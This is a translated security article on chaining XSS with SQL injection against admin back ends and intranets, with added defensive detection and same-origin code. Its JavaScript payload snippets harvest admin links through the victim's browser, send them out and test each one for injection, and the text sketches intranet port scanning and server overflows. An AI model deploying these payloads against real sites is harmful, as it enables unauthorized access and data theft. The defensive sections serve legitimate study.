SQL-injection in XSS [six]

Source: Internet
Author: User
Tags: ftp server url
Why SIX matters:
1. Permission restrictions are always reassuring, for example an admin back end or an intranet. In addition, some projects officially deny that back-end vulnerabilities are dangerous; for example *vbbs's attitude towards the earlier "database backup to get a shell" issue. Indeed, such a vulnerability is hard to exploit directly because of the permission restrictions. Likewise, XSS is often ignored by programmers, and it is not easy to defend against. If the two cases are combined, the difficulty of exploiting XSS drops greatly...
2. Some people will then say that XSS can be used to hijack cookies and directly inherit permissions, for example by logging straight into the back end. That is indeed a good method, but some back ends now bind the session directly to the IP address. Therefore we can instead use XSS to automatically launch a series of attacks on the back end, such as SQL injection.
3. For public programs, you can use HTML/JS code to automatically drive the back-end functions you want to attack, but what if it is a complete black box?

SIX principle:
1. Flowchart

    Hacker ----------> Front end +++++++++
                          ^              +
                          |              +
                      Back end <+++++++++
                          ^
                          |
                     Administrator

   (solid arrows: normal access; "+" arrow: XMLHTTP requests issued from the front-end page by the XSS payload, running in the administrator's browser)

2. XMLHTTP lets your code run quietly:
Code: the "simple XMLHTTP wrapper" written by luoluo, http://pstgroup.blogspot.com/2007/08/javascript.html

SIX in use:
1. Code to obtain the back-end URL:

var xmlhttp = new XMLHTTP();
if (xmlhttp.init()) {
    xmlhttp.get("http://localhost:808/index.php", function (s) {
        // Logged in to the front end as the administrator, list all links and look for the back end,
        // e.g. obtain admin/index.php.
        var re = new RegExp("<a href=\"([^\"]*)", "ig");
        var m = null;
        while ((m = re.exec(s)) != null) {
            alert(m[1]);
            sendurl(m[1]); // In practice you need to write a function that sends and saves the data.
                           // Note that XMLHTTP cannot be used for sending, because XMLHTTP cannot go cross-origin.
        }
    });
}

2. Code that scans the back-end links for injection points:

var xmlhttp = new XMLHTTP();
if (xmlhttp.init()) {
    xmlhttp.get("http://localhost:808/admin/index.php", function (s) {
        var re = new RegExp("<a href=\"([^\"]*)", "ig");
        var m = null;
        while ((m = re.exec(s)) != null) {
            // One request per link found; use a separate object so the outer one is not clobbered.
            var probe = new XMLHTTP();
            if (probe.init()) {
                probe.get(m[1] + "'", function (s1) {
                    if (s1 != null) {
                        alert(s1);
                        sendurl(s1);
                    }
                });
            }
            // alert(m[1]);
        }
    });
}
This simply appends a ' to each link as a test.

3. The attack code is omitted.

The code above is very rough. If you want to complete it, you still need to do a lot of work.
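The two snippets above leave a very recognisable trace on the server: the administrator's own session suddenly requests many distinct back-end pages, each with a single quote appended, within a few seconds. The following Node.js script is an added example, not code from the original article: it parses a constructed access-log excerpt (the "time session path" format and the session IDs are assumptions) and raises one alert per session whose quote-probe rate exceeds a threshold inside a sliding time window.

```javascript
// Added example, not from the original article: a log-side detector for the
// behaviour the two snippets above produce. An admin whose browser is running
// the payload will, within seconds, request many distinct back-end pages with a
// trailing single quote. Log format and session IDs below are constructed.

// Constructed access-log excerpt: "<unix time> <session id> <request path>"
const SAMPLE_LOG = [
  "1000 sess-admin /admin/index.php",
  "1001 sess-admin /admin/user.php?id=1'",
  "1001 sess-admin /admin/news.php?id=7'",
  "1002 sess-admin /admin/cat.php?cid=3%27",
  "1002 sess-admin /admin/del.php?id=9'",
  "1003 sess-admin /admin/edit.php?id=2'",
  "1500 sess-user /index.php",
  "1501 sess-user /view.php?id=1'",
].join("\n");

function parseLine(line) {
  const [ts, session, rawPath] = line.trim().split(/\s+/);
  // Decode so that %27 and a literal quote are treated alike.
  let path;
  try { path = decodeURIComponent(rawPath); } catch (e) { path = rawPath; }
  return { ts: Number(ts), session, path };
}

// The scanner in the article appends a single quote to every link it found.
function isQuoteProbe(path) {
  return path.endsWith("'");
}

// Return one alert per session that issued >= threshold quote probes against
// `prefix` within any `windowSec`-second span.
function detectProbeBursts(logText, opts = {}) {
  const { windowSec = 10, threshold = 3, prefix = "/admin/" } = opts;
  const events = logText.split("\n")
    .filter(l => l.trim() !== "")
    .map(parseLine)
    .filter(e => e.path.startsWith(prefix) && isQuoteProbe(e.path))
    .sort((a, b) => a.ts - b.ts);

  const bySession = new Map();
  for (const e of events) {
    if (!bySession.has(e.session)) bySession.set(e.session, []);
    bySession.get(e.session).push(e);
  }

  const alerts = [];
  for (const [session, evs] of bySession) {
    let best = null;
    let start = 0;
    // Sliding window over the session's probes, sorted by time; keep the densest span.
    for (let end = 0; end < evs.length; end++) {
      while (evs[end].ts - evs[start].ts > windowSec) start++;
      const count = end - start + 1;
      if (count >= threshold && (best === null || count > best.count)) {
        const pages = new Set(evs.slice(start, end + 1).map(e => e.path.split("?")[0]));
        best = { session, count, distinctPages: pages.size,
                 firstTs: evs[start].ts, lastTs: evs[end].ts };
      }
    }
    if (best !== null) alerts.push(best);
  }
  return alerts;
}

console.log(JSON.stringify(detectProbeBursts(SAMPLE_LOG)));
```

On the constructed log this reports only sess-admin (five probes across five distinct pages between t=1001 and t=1003); the lone probe from sess-user stays below the threshold. The `distinctPages` field is what separates an automated scan from a single manual typo, and the same parser can be pointed at real logs by adjusting `parseLine` to the server's format.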

SIX on the intranet:
Many intranet web pages cannot be reached from the Internet. If we want to apply SIX to an intranet, the first problem to solve is cross-domain access:
1. img, iframe and script can be used across domains.
2. XMLHTTP cannot be used cross-origin, but it can be combined with certain cross-origin vulnerabilities.
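The two points above are the same-origin policy seen from both sides: img, iframe and script tags may load a cross-origin resource, but script cannot read the response; XMLHTTP can read the response, but only from its own origin. The following Node.js snippet is an added example, not code from the original article: it implements the scheme/host/port comparison a browser applies and sorts a constructed list of harvested hrefs (page URL, hosts and paths are assumptions) into those the XMLHTTP code above could read and those it could only hit blindly.

```javascript
// Added example, not from the original article: the same-origin check that a
// browser applies before letting script read an XMLHTTP response. It is the rule
// that keeps the scanner above confined to the origin that hosts the XSS, and it
// shows which discovered links would be "blind" (loadable via img/iframe/script,
// response unreadable). All URLs below are constructed.

function originOf(urlString) {
  const u = new URL(urlString);
  // WHATWG URL drops default ports, so fill them back in for a stable comparison.
  const port = u.port || (u.protocol === "https:" ? "443" : "80");
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Scheme, host and port must all match; a different port (808 vs 80) or
// scheme (http vs https) on the same host is a different origin.
function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Split hrefs harvested from a page (relative or absolute) into those whose
// responses script on pageUrl could read, and those it could only trigger blindly.
function partitionLinks(pageUrl, hrefs) {
  const readable = [];
  const blind = [];
  for (const href of hrefs) {
    const abs = new URL(href, pageUrl).href; // resolve relative hrefs against the page
    (sameOrigin(pageUrl, abs) ? readable : blind).push(abs);
  }
  return { readable, blind };
}

// Constructed inputs: the page carrying the XSS and a few hrefs found in it.
const PAGE = "http://localhost:808/index.php";
const HARVESTED = [
  "admin/index.php",                    // relative: same origin as the page
  "http://localhost:808/news.php?id=1",
  "http://localhost/news.php",          // default port 80 != 808
  "http://192.168.0.10/login.php",      // intranet host: different origin
  "https://localhost:808/x",            // same host and port, different scheme
];

console.log(JSON.stringify(partitionLinks(PAGE, HARVESTED), null, 2));
```

For the constructed list only the first two hrefs are readable; the intranet host, the default-port variant and the https variant all land in `blind`. In current browsers this boundary is relaxed only by explicit CORS response headers from the target, so an intranet service that answers with a permissive Access-Control-Allow-Origin is the modern counterpart of the cross-origin vulnerabilities the article goes looking for.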

Steps:
(1) Port scanning
JavaScript-based port scanner: http://www.securiteam.com/exploits/5DP010KJFE.html
Flash port scanner: http://scan.flashsec.org/classes/Main.as
(2) Enumerate the URL list, then scan for injection points and attack
This is hard to do with HTML alone (img/iframe/script), and the XMLHTTP code above cannot be used cross-origin directly, so it must be combined with some cross-origin vulnerability. [Is looking for ActiveX cross-origin vulnerabilities a good approach?]
(3) Overflow in XSS [OIX] (a side question): if we can get cross-origin, XMLHTTP can be used to overflow intranet servers such as FTP and HTTP directly; of course img/iframe/script can also trigger URL overflows in HTTP/FTP servers. It depends on the specific situation.
